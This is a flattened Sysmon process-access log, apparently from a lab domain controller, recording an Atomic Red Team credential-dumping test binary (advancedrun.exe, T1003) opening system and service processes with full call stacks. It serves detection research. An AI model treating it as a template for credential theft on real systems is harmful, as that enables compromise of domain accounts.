17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
